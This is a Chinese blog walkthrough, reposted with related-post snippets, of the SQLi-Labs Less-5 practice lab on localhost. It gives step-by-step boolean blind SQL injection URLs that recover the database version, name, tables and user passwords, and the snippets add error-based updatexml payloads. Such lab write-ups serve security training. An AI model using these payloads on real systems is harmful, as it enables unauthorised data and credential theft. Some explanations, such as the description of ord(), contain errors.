sqli-labs-master第五关Less-5 Double Query- Single:方式一

最新推荐文章于 2024-05-22 11:58:15 发布
最新推荐文章于 2024-05-22 11:58:15 发布
阅读量556 收藏 3
点赞数
文章标签: 数据库
原文链接:https://yq.aliyun.com/articles/501500
版权

由于第三四关和第一第二关大致相同,我就不写了。


接下来来写第五关的第一种方式。



1,目标网站:



http://127.0.0.1/sqli-labs-master/Less-5/?id=1


当传递的ID为1的时候提示“you are in”


1.png


2,查找注入点:  

http://127.0.0.1/sqli-labs-master/Less-5/?id=1返回错误


当输入上面的url的时候就报错了。我们可以从箭头处看到报错的原因。


2.png


说明把“1’”带入数据库查询了,所以存在注入点


3,查看版本信息:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'  and left(version(),1)=5 %23

返回正常

3.png

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'  and left(version(),1)=4 %23


返回错误 所以数据库版本是5.0

4.png



4,判断数据库长度:


http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())= 7 %23

返回错误

5.png

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())= 8 %23

返回正确

6.png

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())= 9 %23

返回错误

所以数据库的名称是8位构成

7.png


5,猜测数据库名称(从第一位开始猜):

1>猜第1

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)>'a' %23

返回正常

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)>'z' %23

返回错误

说明第一位在az之间

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)>'s' %23

返回正确

所以第一位是s

 

1>猜第2

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),2)>'sa' %23

返回正常


http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),2)>'sz' %23

返回错误

说明第二位在az之间

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),2)>'se' %23

返回正确

所以第二位是e

以此类推,直到推出第8位:最后数据库为security


6,猜测数据库(security)中的表:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1)b,1))>n

说明:

a是从0开始第几个表,b是为第几个字符,nASCII所对应的十进制数



7,猜用户:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'and ord(mid((select ifnull(cast(username as char),0x20)from S. Morder by  id  limit A,1),B,1))=%23

 

其中为数据库名;M为表名;A为第几个用户;B为第几个字符;NASCII码所对应的十进制数。

8.猜用户和密码:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'  and ord(mid((select ifnull(cast(username as char),0x20)from S.Morder by id limit A,1),B,1))=N %23 

 

其中为数据库名;M为表名;A为第几个用户;B为第几个字符;NASCII码所对应的十进制数。

例:http://127.0.0.1/sqli-labs-master/Less-5/?id=1'  and ord(mid((select ifnull(cast(password as char),0x20)from security.users order by id limit 0,1),1,1))=68 %23


附录:


substr()用于字符串加减


ord()将ASCLL码值转换为字符 示例: ord('a')表示a在ASSCLL码中的序号,为97; ord('b')表示b在ASSCLL码中的序号,为98; 


mid() :字符串截取函数


语法: mid(字符串,指定截取位数,截取N个)


示例


B6=123456789abcdef      =mid(B6,1,13)    结果= 123456789abcd    





IFNULL(expr1,expr2)  


如果 expr1 不是 NULL,IFNULL() 返回 expr1,否则它返回 expr2。



cast()函数:


参考博客:http://www.studyofnet.com/news/109.html


(1).CAST()函数的参数是一个表达式,它包括用AS关键字分隔的源值和目标数据类型。以下例子用于将文本字符串'12'转换为整型:



SELECT CAST('12' AS int)



(2).返回值是整型值12。如果试图将一个代表小数的字符串转换为整型值,又会出现什么情况呢?



SELECT CAST('12.5' AS int) 



(3).CAST()函数和CONVERT()函数都不能执行四舍五入或截断操作。由于12.5不能用int数据类型来表示,所以对这个函数调用将产生一个错误:

微信公众号


1.jpg


本文转自 天道酬勤VIP 51CTO博客,原文链接:http://blog.51cto.com/tdcqvip/2062354


weixin_34365417
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqli-Labs-MasterLess-5 (报错注入)
Oavinci的博客
06-08 1194
Less5 单引号的注入 ?id=1' 报错 ?id=1'%23 尝试闭合,成功回显 看到这个报错信息,基本就行布尔型盲注、报错型注入、时间延迟型盲注,UNION联合查询型注入应该是不能用了。 查看源代码: $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql)...
Sqli-labs Less-5 Double Query- Single Quotes- String
04-15 212
首先弄一个id出来查看有什么显示出来。 显示上面的内容出来。
sqli-labs---第五
最新发布
2201_75556700的博客
05-22 579
7、查询email_id中的值(这里就拿到了用户email信息)根据页面的提示可以知道这是单引号'的闭合方式,并且是报错注入。5、查字段USER中的信息,这里查不出来,那就换一张表。id=1(没有正常显示)提示了一串字符。6、查询emails 这张表中的字段信息。3、查询表名(看到敏感表users)4、查询users表中字段的信息。id=1'(出现了错误提示)
【SQLi-Labs】Less-6 Double Query- Double Quotes- String
xw1995115的博客
11-15 903
本节实现原理和方法和Less-5基本一样,不同的是单引号变双引号,详见【SQLi-Labs】Less-5 GET - Double Injection - Single Quotes - Stringhttps://blog.csdn.net/xw1995115/article/details/121329780?spm=1001.2014.3001.5501 本节复现下注入过程。 1.利用单引号尝试封闭查询语句,发现未报错 2. 利用双引号尝试封闭查询发现报错,因此为双引号封闭的查询语句 ...
Sqli-labs Less-6 Double Query- Double Quotes- String
04-19 79
打开题目一看,还是输入id,但是输入id一看,跟上一个题目类似什么也没有。 添加单引号测试。也没有任何反应。然后添加双引号测试终于报了错误出来。 看这个错误类型应该是,双引号闭合后 又多了一个双引号导致。 然后尝试报错注入。 /sql/Less-6/?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1)%23 查出数据库名称。接下来查看数据表名称。 /sql/Less-6/?id=1" and updatexml(1,conc
报错注入_sqli-labs less5 Double Query- Single Quotes- String
qq_51550750的博客
03-24 2816
sqli-labs less5 Double Query- Single Quotes- String ?id=1 无回显 考虑报错注入 (1)判断字符型还是数字型 http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%201–+ http://39.101.162.123:10067/Less-5/?id=1%27%20and%201=%202–+ 字符型而且是单引号闭合 (2)判断字段个数: http://39.101.162.123:100
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master
08-22
sqli-labs-master是一个练习sql注入的代码环境
PageHelper分页只会作用于第一次查询,对第二次及以后的查询无效
LiZhen314的博客
07-26 3217
serviceImpl中进行多次查询。controller中使用分页。
基于Sqli-Labs靶场的SQL注入-第五(重点讲双查询注入)
Joker
11-19 4010
双查询是指两个查询语句的嵌套,也就是一个select语句中在去套一个select语句,然后利用group by 语句和floor函数的结合去报错,再将我们需要的信息显示到报错信息中。
Sqli_labs第二十五(报错注入)
m0_65463546的博客
12-18 362
本人呢也是学习Sql注入不久的小白,可能对此题理解的也不是很透彻,但是也算摸爬滚打的把这题做出来了,跟大家一起分享分享,有什么不足的地方欢迎大家指正!相信做到这里的小伙伴对什么是联合注入、盲注啊,单引号爆点位这种基本注入方式已经很熟悉了,我也不做过多的废话在这上面,直接开始我们的正题。
基于Sqli-Labs靶场的SQL注入-25~28
Joker
01-07 1437
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、union 和 select 的绕过。
sqli-labs-master第五+第六
m_ing
05-10 783
话不多说开始吧! http://192.168.89.131/sqli-labs-master/Less-5/ 看到这个提示信息,一脸懵逼。我也查阅了一些资料可能是:布尔型盲注、报错型注入、时间延迟型盲注了。 到这里时我们需要了解一些sql语句、函数。可以参考这位兄弟的博客 其实有很多种方法我们慢慢道来 第一种方法:时间延迟型手工注入 时间延迟型手工注入,正确会延迟,错误没有延迟。id无所谓,又不看回显,可以通过浏览器的刷新提示观察延迟情况,但是id正确的时候的回显有利于观察。 我们构造sql语句,带上延
sqli-labs 第五
m0_63711447的博客
04-01 4511
第五可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
sqli-labs第五sql注入流程
qq_33598708的博客
03-30 5665
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。 所以这的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
sqli-labs-master第一
05-19
sqli-labs-master是一个SQL注入练习平台,第一是一个基础的SQL注入练习。 首先,打开练习平台,找到第一的链接。在链接的末尾加上 `'`,观察页面的响应。如果页面存在SQL注入漏洞,那么会显示类似如下的错误...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值